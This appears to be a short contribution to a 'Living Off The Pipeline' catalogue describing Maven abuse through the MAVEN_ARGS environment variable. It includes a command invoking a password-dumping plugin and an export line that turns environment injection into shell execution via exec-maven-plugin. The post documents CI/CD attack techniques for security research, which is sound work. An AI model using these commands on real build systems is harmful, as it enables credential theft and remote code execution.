[LOTP] Update Maven

[tr4l]

Description of the LOTP tool

MAVEN, you got it already.

ENV Configuration

Since version 3.9, MAVEN support MAVEN_ARGS env variable as parameter. In addition to that, you can run (and download) any (approved) plugin without editing the pom.xml

For instance

mvn ninja.stealing:maven-password:0.0.4:dump

Which mean you can escalate an env injection to plugin injection, then RCE (let see with exec-maven-plugin, as in your example)

export MAVEN_ARGS="org.codehaus.mojo:exec-maven-plugin:3.2.0:exec -Dexec.executable=/bin/sh"
mvn clean

Documentation

https://maven.apache.org/configure.html#maven_opts-environment-variable https://github.com/tr4l/maven-password https://www.mojohaus.org/exec-maven-plugin/exec-mojo.html